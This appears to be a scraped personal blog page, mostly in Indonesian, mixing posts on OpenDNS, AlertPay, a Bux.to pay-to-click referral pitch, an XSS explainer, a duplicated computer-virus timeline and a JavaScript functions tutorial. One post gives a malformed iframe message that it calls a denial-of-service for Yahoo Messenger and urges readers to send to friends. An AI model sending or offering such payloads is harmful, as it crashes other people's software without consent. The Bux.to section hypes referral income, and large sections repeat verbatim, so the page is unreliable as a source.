Open DNS memberikan kemudahan bagi anda untuk mengelola DNS anda, dengan menggunakan Open DNS kecepatan browsing bisa ditingkatkan.
208.67.222.222
208.67.220.220
Browsing aman dengan Open DNS
DNS atau Domain Name System merupakan layanan di Internet untuk jaringan yang menggunakan TCP/IP. Layanan ini digunakan untuk mengidentifikasi sebuah komputer dengan nama bukan dengan menggunakan nomor (IP address). Singkatnya DNS melakukan konversi dari nama ke angka. DNS dilakukan secara desentralisasi, dimana setiap daerah atau tingkat organisasi memiliki domain sendiri.
Open DNS memberikan kemudahan bagi anda untuk mengelola DNS anda, dengan menggunakan Open DNS kecepatan browsing bisa ditingkatkan.
Open DNS memberikan kemudahan bagi anda untuk mengelola DNS anda, dengan menggunakan Open DNS kecepatan browsing bisa ditingkatkan.
Alertpay
Labels:
alertpay
Pernah dengar AlertPay? Mungkin wajar jika tidak. Payment processor yang satu ini memang baru santer terdengar belakangan ini sejak peristiwa suspend masal akun Paypal pemilik program PTC/PTR. Entah mengapa, Paypal menyamakan PTC/PTR dengan program-program money-game, pyramid scheme, dan sejenisnya; sehingga mereka memutuskan bahwa akun para pemilik PTC/PTR telah melanggar aturan penggunaan Paypal. Beberapa pemilik PTC/PTR memanfaatkan momen ini untuk kabur. Untungnya, masih ada yang beritikad baik dan mencari jalan untuk survive. Dan salah satu jalan keluar yang dipilih untuk menyelesaikan masalah dengan Paypal adalah berpindah ke payment processor yang lain, AlertPay.
Sekilas AlertPay
Secara umum, AlertPay tidak jauh berbeda dengan Paypal, sehingga saya tidak perlu menjelaskan panjang lebar mengenainya. Kita dapat membeli atau menjual produk melalui AlertPay, mengisi dana di akun kita, maupun menarik dana yang ada di akun kita.
Ada 3 macam keanggotaan di AlertPay, yaitu: Personal Account, Premium Account, dan Secured Account. Untuk detilnya, lihat sini saja ya, malas terjemahin ah.
Verifikasi AlertPay
Proses verifikasi akun AlertPay tergolong mudah. Kita cukup meng-upload hasil scan kartu identitas kita (bisa paspor, KTP, SIM, dan sejenisnya), serta tagihan yang dialamatkan ke rumah kita (misal tagihan telepon, kartu kredit, dan sejenisnya). Dokumen pertama digunakan untuk memverifikasi identitas kita, sedangkan dokumen kedua digunakan untuk memverifikasi alamat tinggal kita. Apabila keduanya sudah kita upload, kita tinggal menunggu pihak AlertPay melakukan pengecekan manual (memakan waktu kurang lebih 1 minggu dan TIDAK diberikan pemberitahuan apabila sudah verified).
Mengisi Dana AlertPay
Untuk mengisi dana akun kita di AlertPay ada beberapa cara. Namun yang utama (dan mudah untuk diberlakukan oleh kita yang berdomisili di Indonesia) adalah melalui E-Gold, Money Order, dan Kartu Kredit.
Menarik Dana AlertPay
Untuk penarikan dana di AlertPay, pilihannya hampir sama dengan pengisian dana, namun sayangnya, minus kartu kredit. Kita dapat me-withdraw dana kita melalui check maupun E-Gold. Penarikan langsung melalui EFT sebenarnya bisa, namun untuk saat ini negara kita belum didukung. Mungkin karena belum banyak yang menggunakan jasa AlertPay.
Referral AlertPay
Sama seperti halnya Paypal, E-Gold, dan kebanyakan payment processor lain, AlertPay juga memberlakukan sistem referral. Di sini, kita dapat memperoleh $5 dari setiap orang yang kita referensikan ke AlertPay. Apabila kita sudah memiliki 10 referral, untuk tiap referral berikutnya komisi kita dinaikkan 2x lipat, yaitu $10.
Tapi….. ada syaratnya :)
Yang pertama, referral kita harus memiliki akun bertipe Premium atau Secured. Dan yang kedua, mereka harus melakukan transaksi minimal $250. Hmmm, kira-kira bisa diharapkan gak ya komisinya :)
Pendapatan dari Bux.to
Kita semua tentu sering melihat iklan, entah di televisi, entah di gedung bioskop, dll. Sayangnya, kita tidak menerima keuntungan finansial apapun dari aktivitas melihat iklan. Nah di Internet ada peluang menerima penghasilan online dengan melihat iklan tertentu; yang disebut dengan program PTC (Pay To Click) dan PTR (Pay To Read).
Salah satu program PTC yang menarik (setidaknya bagi saya saat ini) adalah Bux.to (aff). Di sini, tiap kali melihat iklan website selama 30 detik, kita akan mendapatkan $0.01 (atau $0.0125 untuk premium member). Sebagai member, kita akan mendapatkan ‘jatah’ iklan sekitar 14-17 website setiap harinya, dengan perkataan lain, kita berpotensi menerima $0.14 - $0.17 per hari.
Namun hal yang paling menarik adalah kita dapat memperkenalkan program PTC Bux.to ini kepada orang lain dan kita mendapatkan keuntungan 100% dari setiap transaksi mereka! Jadi bila kita memiliki 100 referral, dan setiap orang melihat 15 iklan setiap harinya, maka Anda akan mendapatkan komisi 100 x $0.15 = $15 per hari (atau $450 per bulan)! Sungguh menarik, bukan??
Silakan daftar segera di Bux.to SEKARANG!! Pastikan Anda telah memiliki account Paypal sebelumnya (baca caranya di sini).
Note #1:
Sebenarnya tidak ada risiko besar yang perlu dikhawatirkan (untuk free member), Anda tidak perlu mengeluarkan uang sepeserpun untuk melakukan bisnis ini. Anda cukup memanfaatkan PC dengan koneksi Internet yang ada. Lagipula Anda tidak dituntut untuk memiliki pengetahuan yang mendalam untuk menjalankan bisnis ini. Jadi tunggu apalagi, segera daftar di Bux.to secara GRATIS sekarang!!
Note #2:
Saya tidak menggaransi apakah Bux.to benar-benar melakukan pembayaran kepada anggotanya, apalagi mengingat saya pribadi belum memenuhi batas minimal pembayaran mereka. Jadi bila Anda memutuskan untuk melakukan investasi dalam program PTC mereka (misalnya upgrade menjadi premium member ataupun membeli referral), lakukanlah dengan risiko Anda sendiri.
Note #3:
Bagi Anda yang merasa enggan menjadi referral seseorang, “ngapain sih repot-repot jadi referral si Anu… toh khan cuman nguntungin si Anu doang”, demikian pikir Anda; pahami bahwa setiap orang yang mendaftar di Bux.to pasti menjadi referral seseorang, entah itu orang yang memang me-refer Anda, atau Bux.to sendiri, atau Anda ‘dijual’ (maksudnya dialihkan menjadi referral) oleh Bux.to ke seseorang yang membeli paket referral. Berpikirlah dari sudut pandang Anda, tidaklah perlu memikirkan keuntungan orang lain, dan segera putuskan apakah Anda mau mengambil peluang bisnis ini atau tidak.
Note #4:
TOS (Terms of Service) Bux.to berubah, pembayaran dilakukan dalam 30 hari kerja untuk premium member dan 60 hari kerja untuk free member. Waspadai ini karena berpengaruh besar terhadap cashflow kita.
Untuk daftar silahkan klik disini
Salah satu program PTC yang menarik (setidaknya bagi saya saat ini) adalah Bux.to (aff). Di sini, tiap kali melihat iklan website selama 30 detik, kita akan mendapatkan $0.01 (atau $0.0125 untuk premium member). Sebagai member, kita akan mendapatkan ‘jatah’ iklan sekitar 14-17 website setiap harinya, dengan perkataan lain, kita berpotensi menerima $0.14 - $0.17 per hari.
Namun hal yang paling menarik adalah kita dapat memperkenalkan program PTC Bux.to ini kepada orang lain dan kita mendapatkan keuntungan 100% dari setiap transaksi mereka! Jadi bila kita memiliki 100 referral, dan setiap orang melihat 15 iklan setiap harinya, maka Anda akan mendapatkan komisi 100 x $0.15 = $15 per hari (atau $450 per bulan)! Sungguh menarik, bukan??
Silakan daftar segera di Bux.to SEKARANG!! Pastikan Anda telah memiliki account Paypal sebelumnya (baca caranya di sini).
Note #1:
Sebenarnya tidak ada risiko besar yang perlu dikhawatirkan (untuk free member), Anda tidak perlu mengeluarkan uang sepeserpun untuk melakukan bisnis ini. Anda cukup memanfaatkan PC dengan koneksi Internet yang ada. Lagipula Anda tidak dituntut untuk memiliki pengetahuan yang mendalam untuk menjalankan bisnis ini. Jadi tunggu apalagi, segera daftar di Bux.to secara GRATIS sekarang!!
Note #2:
Saya tidak menggaransi apakah Bux.to benar-benar melakukan pembayaran kepada anggotanya, apalagi mengingat saya pribadi belum memenuhi batas minimal pembayaran mereka. Jadi bila Anda memutuskan untuk melakukan investasi dalam program PTC mereka (misalnya upgrade menjadi premium member ataupun membeli referral), lakukanlah dengan risiko Anda sendiri.
Note #3:
Bagi Anda yang merasa enggan menjadi referral seseorang, “ngapain sih repot-repot jadi referral si Anu… toh khan cuman nguntungin si Anu doang”, demikian pikir Anda; pahami bahwa setiap orang yang mendaftar di Bux.to pasti menjadi referral seseorang, entah itu orang yang memang me-refer Anda, atau Bux.to sendiri, atau Anda ‘dijual’ (maksudnya dialihkan menjadi referral) oleh Bux.to ke seseorang yang membeli paket referral. Berpikirlah dari sudut pandang Anda, tidaklah perlu memikirkan keuntungan orang lain, dan segera putuskan apakah Anda mau mengambil peluang bisnis ini atau tidak.
Note #4:
TOS (Terms of Service) Bux.to berubah, pembayaran dilakukan dalam 30 hari kerja untuk premium member dan 60 hari kerja untuk free member. Waspadai ini karena berpengaruh besar terhadap cashflow kita.
Untuk daftar silahkan klik disini
Apakah itu XSS (Cross Site Scripting) ?
Labels:
XSS
XSS (Cross Site Scripting) adalah salah satu metode untuk mengeksploitasi suatu sistem . Kebanyakan kesalahannya ada pada penulisan scripting pada halaman web tersebut yang mengijinkan beberapa karakter tertentu dijalankan pada situs tersebut.
Metode eksploitasi yang dipaparkan disini adalah dengan cara memanipulasi pemanggilan form atau menu yang ada pada halaman situs target. Biasanya waktu kita masuk pada sebuah halaman web, yang pertama kita lihat pastilah halaman utamanya atau menu utama dari situs tersebut. Di menu utama atau halaman utama tersebut biasanya terdapat link-link untuk masuk ke halaman yang lebih dalam. Untuk mengetahui apa yang akan dipanggil pada saat link tersebut kita klik yaitu lihat di scroolbar yang ada dibawah pojok sebelah kiri pada browser anda. Biasanya seperti ini :
Contoh
http://target.com/index.html?menu=
http://target.com/index.html?menu=ME FOUND BUG
[+] Setiap kita membuka suatu halaman web, kita mengirimkan suatu permintaan kepada server tersebut. Jika permintaan kita terdapat di server, maka browser akan menampilkan halaman yang kita minta tersebut. Tetapi jika mengirimkan permintaan dalam bentuk script apakah yang terjadi ???? Yang terjadi adalah server berusaha mencari permintaan kita, jika memang di server tidak ada maka permintaan kita akan ditampilkan di browser kita
[+] *Script yang bisa digunakan untuk XSS adalah :
- -> HTML
- -> JavaScript
- -> VBScript
- -> Active X
- -> Flash
Pencegahan Dengan cara memfilter atau dengan kata lain, server tersebut sudah di setting agar tidak melayani permintaan yang mengandung beberapa karakter seperti berikut :
Char ; / ? : @ = & < > “ #
Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Char { } | \ ^ ~ [ ] ` % ‘
Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27
Jadi Kunci utama pada XSS yaitu user dapat memasukkan data melalui input form (contohnya input form seperti kita akan mem-posting sesuatu di forum) yang kemudian akan ditampilkan kemudian oleh user lain atau user itu sendiri. Kalau si programmer nya tidak memfilter tags elemen HTML atau tanda bahasa pemrograman lain ya dengan mudah akan bisa di cross site scripting.
DoS (Denial of Service) untuk Yahoo Messenger version 7.5.0.814
Labels:
Yahoo Messenger
DoS (Denial of Service) untuk Yahoo Messenger version 7.5.0.814 dan mngkin versi lain
 | Code: |
 | msg:———————————————iframe onload=$InlineAction()>:) |
dan coba anda send ke teman2 anda…. (PM)
sumber echo.or.id
Tribute To The Computer Virus
The first recorded computer virus was known as 'The Creaper'. Known to infect computers with the Tanex operating system,
this stone age virus would display,
"I'M THE CREEPER : CATCH ME IF YOU CAN."
This first recorded computer virus originated in the 1970's and could only infect others in that
intranet (if you could call it that). Soon after another virus known as the Elk Cloner was known to be the first computer virus known
to infect 'outside the single computer or lab where it was created.' This claim is false even though this virus is notable because it was created by a high school student that then added it to a game.
The game would run 49 times normally and then on the 50th it would display the following poem,
"It will get on all your disks. It will infiltrate your chips. Yes it's Cloner! It will stick to you like glue. It will modify RAM too. Send in the Cloner!"
Then the computer would be infected.
Many computer viruses at that time were spread mainly by floppies or other removable media since networks and the internet were not popular.
Some viruses infected the programs located on the disk or they would install on the boot sector of the computer insuring that when the computer was ran the virus would run too.
More current viruses aare meant to exploit CSS vulnerabilities and are commonly seen attacking sites well known and used such as MySpace or Yahoo.
The following is a timeline of notable computer viruses. This was taken from wikipedia.org and credit goes towards those who contributed to it.
1970-1979
Early 1970s
Creeper virus was detected on ARPANET infecting the Tenex operating system. Creeper gained access independently through a modem and copied itself to the remote system where the message, 'I'M THE CREEPER : CATCH ME IF YOU CAN.' was displayed. The Reaper program, itself a virus, was created to delete Creeper, the creators of both programs are unknown.
1974
Rabbit virus appears infecting other machines via multiplication. Named for the speed at which it clogged the system with copies of itself, reducing system performance, before reaching a threshold and crashing.
1975
Pervading Animal, a game written for the UNIVAC 1108, appeared. It remains a matter of debate whether Pervading Animal represented the first Trojan or an innocent game with unintended bugs.
1980-1989
1980
Jürgen Kraus wrote master thesis Selbstreproduktion bei Programmen (Self-reproduction of programs) Warning: Downloads from this site may contain concept viruses.
1981
A program called Elk Cloner, written for Apple II systems and created by Richard Skrenta. Apple II was seen as particularly vulnerable due to the storage of its operating system on Floppy disk. Elk Cloner's design combined with public ignorance about what malware was and how to protect against it led to Elk Cloner being responsible for the first large-scale computer virus outbreak in history
1983
The term 'virus' is coined by Frederick Cohen in describing self-replicating computer programs. In 1984 Cohen uses the phrase "computer virus" – as suggested by his teacher Leonard Adleman – to describe the operation of such programs in terms of "infection". He defines a 'virus' as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself."
November 10th, 1983, at Lehigh University, Cohen demonstrates a virus-like program on a VAX11/750 system. The program was able to install itself to, or infect, other system objects.
1986
January: The Brain boot sector virus (aka Pakistani flu) is released to the wild. Brain is considered the first IBM PC compatible virus, and the program responsible for the first IBM PC compatible virus epidemic. The virus is also known as Lahore, Pakistani, Pakistani Brain, as it was created in Lahore, Pakistan by 19 year old Pakistani programmer, Basit Farooq Alvi and his brother Amjad Farooq Alvi.
December 1986: Ralf Burger presented the Virdem model of programs at a meeting of the underground Chaos Computer Club in Germany. The Virdem model represented the first programs that could replicate themselves via addition of their code to executable DOS files in COM format.
1987
Appearance of the Vienna virus, which was subsequently neutralized- the first time this had happened on the IBM platform.[1]
Appearance of Lehigh virus, boot sector viruses such as Yale from USA, Stoned from New Zealand, Ping Pong from Italy, and appearance of first self-encrypting file virus, Cascade. Lehigh was never released to the wild however. A subsequent infection of Cascade in the offices of IBM Belgium led to IBM responding with its own antivirus product development. Prior to this, antivirus solutions developed at IBM were intended for staff use only.
October: The Jerusalem virus, part of the (at that time unknown) Suriv family, is detected in the city of Jerusalem. Jerusalem destroys all executable files on infected machines upon every occurrence of Friday the 13th (except Friday the 13th Nov 1987 making its first trigger date May 13th 1988). Jerusalem caused a worldwide epidemic in 1988.
November: The SCA virus, a boot sector virus for Amigas appears, immediately creating a pandemic virus-writer storm. A short time later, SCA releases another, considerably more destructive virus, the Byte Bandit.
1988
June: The Festering Hate, Apple, ProDOS virus spreads from underground pirate BBS systems and starts infecting mainstream networks.
November 2: The Morris worm, created by Robert Tappan Morris, infects DEC VAX and Sun machines running BSD UNIX connected to the Internet, and becomes the first worm to spread extensively "in the wild", and one of the first well-known programs exploiting buffer overrun vulnerabilities.
1989
October 1989: Ghostball, the first multipartite virus, is discovered by Friðrik Skúlason
1990-1999
1990
Mark Washburn working on an analysis of the Vienna and Cascade viruses with Ralf Burger develops the first family of polymorphic virus: the Chameleon family. Chameleon series debuted with the release of 1260.
1992
Michelangelo was expected to create a digital apocalypse on March 6th, with millions of computers having their information wiped according to mass media hysteria surrounding the virus. Later assessments of the damage showed the aftermath to be minimal.
1995
The "Concept virus" the first Macro virus is created
1996
"Ply" - DOS 16-bit based complicated polymorphic virus appeared with built-in permutation engine.
1998
June 2: The first version of the CIH virus appears.
1999
March 26: The Melissa worm is released, targeting Microsoft Word and Outlook-based systems, and creating considerable network traffic.
June 6: The ExploreZip worm, which destroys Microsoft Office documents, is first detected.
The Happy99 worm invisibly attached itself to emails. Dislplayed fireworks to hide changes being made and wished you a happy new year. Modified system files related to Outlook Express and Internet Explorer on Windows 95 and Windows 98.
2000 and later
2000
May: The VBS/Loveletter ('ILOVEYOU') worm appeared. As of 2004 this is the most costly virus to business, causing upwards of 10 billion dollars in damage. The backdoor trojan to the worm, Barok, was created by Filipino programmer Onel de Guzman; it is not known who created the attack vector or who (inadvertently) unleashed it; de Guzman himself denies being behind the outbreak although he suggests he may have been duped by someone using his own Barok code as a payload.
Zmist - Z0mbie's fully metamorphic, code integrating virus.
2001
January: A worm strikingly similar to the Morris worm, named the Ramen worm infected only Red Hat Linux machines running version 6.2 and 7, using three vulnerabilities in wu-ftpd, rpc-statd and lpd.
March: Simile - published in nr 6 29A e-zine, written by The Mental Driller in assembly language multi-OS, metamorphic virus.
May 8: The Sadmind worm spreads by exploiting holes in both Sun Microsystems Solaris (Security Bulletin 00191) and Microsoft Internet Information Services (MS00-078).
July: The Sircam worm is released, spreading through e-mails and unprotected network shares.
July 13: The Code Red worm attacking the Index Server ISAPI Extension in Microsoft Internet Information Services with a vulnerability described in MS01-033, is released.
August 4: A complete re-write of the Code Red worm, Code Red II begins aggressively spreading, primarily in China.
September 18: The Nimda worm is discovered and spreads through a variety of means including vulnerabilities described in MS01-044 and backdoors left by Code Red II and Sadmind worm.
October 26: The Klez worm is first identified.
2003
January 24: The SQL slammer worm also known as the Sapphire worm, attacked vulnerabilities in Microsoft SQL Server and MSDE described in MS02-039 and MS02-061, causes widespread problems on the Internet.
August 12: The Blaster worm, also known as the Lovesan worm, spread rapidly by exploiting Microsoft Windows computers vulnerable to exploits first described in MS03-026 and later in MS03-039.
August 18: The Welchia (Nachi) worm is discovered. The worm tries to remove the blaster worm and patch Windows.
August 19: The Sobig worm (technically the Sobig.F worm) spread rapidly via mail and network shares.
October 24: The Sober worm is first seen and maintains its presence until 2005 with many new variants.
The simultaneous attack on network weakpoints by the Blaster and Sobig worms caused a massive amount of damage.
2004
Late January: MyDoom emerges, and currently holds the record for the fastest-spreading mass mailer worm.
March 19: The Witty worm is a record-breaking worm in many regards. It exploited holes in several Internet Security Systems (ISS) products. It was the fastest disclosure to worm, it was the first internet worm to carry a destructive payload and it spread rapidly using a pre-populated list of ground-zero hosts.
May 1: The Sasser worm emerges by exploiting a vulnerability in LSASS described in MS04-011 and causes problems in networks, even interrupting business in some cases.
December: Santy, the first known "webworm" is launched. It exploited a vulnerability in phpBB described in BID10701 and used Google in order to find new targets. It infected around 40000 sites before Google filtered the search query used by the worm, preventing it from spreading.
2005
August 16: The Zotob worm and several variations of malware exploiting the vulnerability described in MS05-039 are discovered. The effect was overblown because several United States media outlets were infected.
October 13: The Samy virus became the fastest spreading virus as of 2006.
2006
January 20: The Nyxem worm was discovered. It spread by mass-mailing. Its payload, which activates on the third of every month, starting on February 3, attempts to disable security-related and file sharing software, and destroy files of certain types, such as Microsoft Office files.
February 16: discovery of the first-ever virus for Mac OS X, a low-threat worm known as OSX/Leap-A or OSX/Oompa-A, is announced.[1]
Mid-June: Precursor to the "w0rm.EricAndrew" worm is released on the popular website MySpace. The worm is spread through visiting profiles and copying itself through a Quicktime security hole into the "Music" section on the victims profile. The worm, known as the "lOrdOfthenOOse" worm, changed display names to "lOrdOfthenOOse", and not allowing the name to be changed. The worm was defeated 2 ways. The primary way was through removing the code from the profile. The way it was eradicated, however, was through the removal of the link by the webmaster of the website the virus was uploaded to. Eradicated 4 days after release. No damage was caused, but it was estimated that 70% of all MySpace, or over 70 million profiles, were infected with the worm [citation needed]. A patch was released from Quicktime specifically for Myspace users to prevent a worm being spread in this manner again.
June 28: Investigators stated that Essebar may have authored more than 20 other viruses including the Mydoom variant, Mydoom-BG, and the Zotob-related Mytob worm.[2]
2007
January 7: A worm generated by hackers of the popular website MySpace was discovered by many users on the site. Some sites were unaffected while others showed display names of w0rm.EricAndrew. The hackers, Eric and Andrew changed wordings and added to others' sites.
January 17 : Peacomm Trojan identified as a fast spreading email spamming threat thought to have originated from Russia, it disguises itself as a news email containing a film about bogus news stories asking you to download the attachment which it claims is a film.
this stone age virus would display,
"I'M THE CREEPER : CATCH ME IF YOU CAN."
This first recorded computer virus originated in the 1970's and could only infect others in that
intranet (if you could call it that). Soon after another virus known as the Elk Cloner was known to be the first computer virus known
to infect 'outside the single computer or lab where it was created.' This claim is false even though this virus is notable because it was created by a high school student that then added it to a game.
The game would run 49 times normally and then on the 50th it would display the following poem,
"It will get on all your disks. It will infiltrate your chips. Yes it's Cloner! It will stick to you like glue. It will modify RAM too. Send in the Cloner!"
Then the computer would be infected.
Many computer viruses at that time were spread mainly by floppies or other removable media since networks and the internet were not popular.
Some viruses infected the programs located on the disk or they would install on the boot sector of the computer insuring that when the computer was ran the virus would run too.
More current viruses aare meant to exploit CSS vulnerabilities and are commonly seen attacking sites well known and used such as MySpace or Yahoo.
The following is a timeline of notable computer viruses. This was taken from wikipedia.org and credit goes towards those who contributed to it.
1970-1979
Early 1970s
Creeper virus was detected on ARPANET infecting the Tenex operating system. Creeper gained access independently through a modem and copied itself to the remote system where the message, 'I'M THE CREEPER : CATCH ME IF YOU CAN.' was displayed. The Reaper program, itself a virus, was created to delete Creeper, the creators of both programs are unknown.
1974
Rabbit virus appears infecting other machines via multiplication. Named for the speed at which it clogged the system with copies of itself, reducing system performance, before reaching a threshold and crashing.
1975
Pervading Animal, a game written for the UNIVAC 1108, appeared. It remains a matter of debate whether Pervading Animal represented the first Trojan or an innocent game with unintended bugs.
1980-1989
1980
Jürgen Kraus wrote master thesis Selbstreproduktion bei Programmen (Self-reproduction of programs) Warning: Downloads from this site may contain concept viruses.
1981
A program called Elk Cloner, written for Apple II systems and created by Richard Skrenta. Apple II was seen as particularly vulnerable due to the storage of its operating system on Floppy disk. Elk Cloner's design combined with public ignorance about what malware was and how to protect against it led to Elk Cloner being responsible for the first large-scale computer virus outbreak in history
1983
The term 'virus' is coined by Frederick Cohen in describing self-replicating computer programs. In 1984 Cohen uses the phrase "computer virus" – as suggested by his teacher Leonard Adleman – to describe the operation of such programs in terms of "infection". He defines a 'virus' as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself."
November 10th, 1983, at Lehigh University, Cohen demonstrates a virus-like program on a VAX11/750 system. The program was able to install itself to, or infect, other system objects.
1986
January: The Brain boot sector virus (aka Pakistani flu) is released to the wild. Brain is considered the first IBM PC compatible virus, and the program responsible for the first IBM PC compatible virus epidemic. The virus is also known as Lahore, Pakistani, Pakistani Brain, as it was created in Lahore, Pakistan by 19 year old Pakistani programmer, Basit Farooq Alvi and his brother Amjad Farooq Alvi.
December 1986: Ralf Burger presented the Virdem model of programs at a meeting of the underground Chaos Computer Club in Germany. The Virdem model represented the first programs that could replicate themselves via addition of their code to executable DOS files in COM format.
1987
Appearance of the Vienna virus, which was subsequently neutralized- the first time this had happened on the IBM platform.[1]
Appearance of Lehigh virus, boot sector viruses such as Yale from USA, Stoned from New Zealand, Ping Pong from Italy, and appearance of first self-encrypting file virus, Cascade. Lehigh was never released to the wild however. A subsequent infection of Cascade in the offices of IBM Belgium led to IBM responding with its own antivirus product development. Prior to this, antivirus solutions developed at IBM were intended for staff use only.
October: The Jerusalem virus, part of the (at that time unknown) Suriv family, is detected in the city of Jerusalem. Jerusalem destroys all executable files on infected machines upon every occurrence of Friday the 13th (except Friday the 13th Nov 1987 making its first trigger date May 13th 1988). Jerusalem caused a worldwide epidemic in 1988.
November: The SCA virus, a boot sector virus for Amigas appears, immediately creating a pandemic virus-writer storm. A short time later, SCA releases another, considerably more destructive virus, the Byte Bandit.
1988
June: The Festering Hate, Apple, ProDOS virus spreads from underground pirate BBS systems and starts infecting mainstream networks.
November 2: The Morris worm, created by Robert Tappan Morris, infects DEC VAX and Sun machines running BSD UNIX connected to the Internet, and becomes the first worm to spread extensively "in the wild", and one of the first well-known programs exploiting buffer overrun vulnerabilities.
1989
October 1989: Ghostball, the first multipartite virus, is discovered by Friðrik Skúlason
1990-1999
1990
Mark Washburn working on an analysis of the Vienna and Cascade viruses with Ralf Burger develops the first family of polymorphic virus: the Chameleon family. Chameleon series debuted with the release of 1260.
1992
Michelangelo was expected to create a digital apocalypse on March 6th, with millions of computers having their information wiped according to mass media hysteria surrounding the virus. Later assessments of the damage showed the aftermath to be minimal.
1995
The "Concept virus" the first Macro virus is created
1996
"Ply" - DOS 16-bit based complicated polymorphic virus appeared with built-in permutation engine.
1998
June 2: The first version of the CIH virus appears.
1999
March 26: The Melissa worm is released, targeting Microsoft Word and Outlook-based systems, and creating considerable network traffic.
June 6: The ExploreZip worm, which destroys Microsoft Office documents, is first detected.
The Happy99 worm invisibly attached itself to emails. Dislplayed fireworks to hide changes being made and wished you a happy new year. Modified system files related to Outlook Express and Internet Explorer on Windows 95 and Windows 98.
2000 and later
2000
May: The VBS/Loveletter ('ILOVEYOU') worm appeared. As of 2004 this is the most costly virus to business, causing upwards of 10 billion dollars in damage. The backdoor trojan to the worm, Barok, was created by Filipino programmer Onel de Guzman; it is not known who created the attack vector or who (inadvertently) unleashed it; de Guzman himself denies being behind the outbreak although he suggests he may have been duped by someone using his own Barok code as a payload.
Zmist - Z0mbie's fully metamorphic, code integrating virus.
2001
January: A worm strikingly similar to the Morris worm, named the Ramen worm infected only Red Hat Linux machines running version 6.2 and 7, using three vulnerabilities in wu-ftpd, rpc-statd and lpd.
March: Simile - published in nr 6 29A e-zine, written by The Mental Driller in assembly language multi-OS, metamorphic virus.
May 8: The Sadmind worm spreads by exploiting holes in both Sun Microsystems Solaris (Security Bulletin 00191) and Microsoft Internet Information Services (MS00-078).
July: The Sircam worm is released, spreading through e-mails and unprotected network shares.
July 13: The Code Red worm attacking the Index Server ISAPI Extension in Microsoft Internet Information Services with a vulnerability described in MS01-033, is released.
August 4: A complete re-write of the Code Red worm, Code Red II begins aggressively spreading, primarily in China.
September 18: The Nimda worm is discovered and spreads through a variety of means including vulnerabilities described in MS01-044 and backdoors left by Code Red II and Sadmind worm.
October 26: The Klez worm is first identified.
2003
January 24: The SQL slammer worm also known as the Sapphire worm, attacked vulnerabilities in Microsoft SQL Server and MSDE described in MS02-039 and MS02-061, causes widespread problems on the Internet.
August 12: The Blaster worm, also known as the Lovesan worm, spread rapidly by exploiting Microsoft Windows computers vulnerable to exploits first described in MS03-026 and later in MS03-039.
August 18: The Welchia (Nachi) worm is discovered. The worm tries to remove the blaster worm and patch Windows.
August 19: The Sobig worm (technically the Sobig.F worm) spread rapidly via mail and network shares.
October 24: The Sober worm is first seen and maintains its presence until 2005 with many new variants.
The simultaneous attack on network weakpoints by the Blaster and Sobig worms caused a massive amount of damage.
2004
Late January: MyDoom emerges, and currently holds the record for the fastest-spreading mass mailer worm.
March 19: The Witty worm is a record-breaking worm in many regards. It exploited holes in several Internet Security Systems (ISS) products. It was the fastest disclosure to worm, it was the first internet worm to carry a destructive payload and it spread rapidly using a pre-populated list of ground-zero hosts.
May 1: The Sasser worm emerges by exploiting a vulnerability in LSASS described in MS04-011 and causes problems in networks, even interrupting business in some cases.
December: Santy, the first known "webworm" is launched. It exploited a vulnerability in phpBB described in BID10701 and used Google in order to find new targets. It infected around 40000 sites before Google filtered the search query used by the worm, preventing it from spreading.
2005
August 16: The Zotob worm and several variations of malware exploiting the vulnerability described in MS05-039 are discovered. The effect was overblown because several United States media outlets were infected.
October 13: The Samy virus became the fastest spreading virus as of 2006.
2006
January 20: The Nyxem worm was discovered. It spread by mass-mailing. Its payload, which activates on the third of every month, starting on February 3, attempts to disable security-related and file sharing software, and destroy files of certain types, such as Microsoft Office files.
February 16: discovery of the first-ever virus for Mac OS X, a low-threat worm known as OSX/Leap-A or OSX/Oompa-A, is announced.[1]
Mid-June: Precursor to the "w0rm.EricAndrew" worm is released on the popular website MySpace. The worm is spread through visiting profiles and copying itself through a Quicktime security hole into the "Music" section on the victims profile. The worm, known as the "lOrdOfthenOOse" worm, changed display names to "lOrdOfthenOOse", and not allowing the name to be changed. The worm was defeated 2 ways. The primary way was through removing the code from the profile. The way it was eradicated, however, was through the removal of the link by the webmaster of the website the virus was uploaded to. Eradicated 4 days after release. No damage was caused, but it was estimated that 70% of all MySpace, or over 70 million profiles, were infected with the worm [citation needed]. A patch was released from Quicktime specifically for Myspace users to prevent a worm being spread in this manner again.
June 28: Investigators stated that Essebar may have authored more than 20 other viruses including the Mydoom variant, Mydoom-BG, and the Zotob-related Mytob worm.[2]
2007
January 7: A worm generated by hackers of the popular website MySpace was discovered by many users on the site. Some sites were unaffected while others showed display names of w0rm.EricAndrew. The hackers, Eric and Andrew changed wordings and added to others' sites.
January 17 : Peacomm Trojan identified as a fast spreading email spamming threat thought to have originated from Russia, it disguises itself as a news email containing a film about bogus news stories asking you to download the attachment which it claims is a film.
javaScript Functions explained
Labels:
Javascript
Oh well, i made this topic because i've seen alot of codes here being misused.
So what is a function?
functions is a block of code that perform a routine or process. it can return a value or not return anything at all, just execute a block of code. It can also accept arguments or parameters. A function must not be duplicated in a document(which may contain more that 1 javascript). However it can be called many times.
Here's some example of the syntax, foo can be anything provided it doesnt begin with number and only contains letter and underscore.
function that execute a code
how to call:
so now you know how to use a function. As I said a function must not be duplicated, it will cause bugs if you do.
Why use functions?
Basically we want our code short, in practicality we use function so that we can execute the same code many times without making the same code.
So what is a function?
functions is a block of code that perform a routine or process. it can return a value or not return anything at all, just execute a block of code. It can also accept arguments or parameters. A function must not be duplicated in a document(which may contain more that 1 javascript). However it can be called many times.
Here's some example of the syntax, foo can be anything provided it doesnt begin with number and only contains letter and underscore.
function that execute a code
function foo() {
alert("hi");
}
how to call:
foo();
will show an alert with "hi" message
function that execute a code but requires a parameter
function foo(message) {
alert(message);
}
how to call:
foo("hi");
will show an alert with "hi" message
function returns a value
function foo() {
return "hi";
}
how to call:
alert(foo());
will show an alert with "hi" message
function returns a value but requires a parameter
function foo(message) {
if(message) return true;
return false;
}
how to call:
will show an alert with "true" messagealert(foo("hi"));
so now you know how to use a function. As I said a function must not be duplicated, it will cause bugs if you do.
Why use functions?
Basically we want our code short, in practicality we use function so that we can execute the same code many times without making the same code.
Hacking Websites: Fun or Terror? hhaha
Labels:
etc
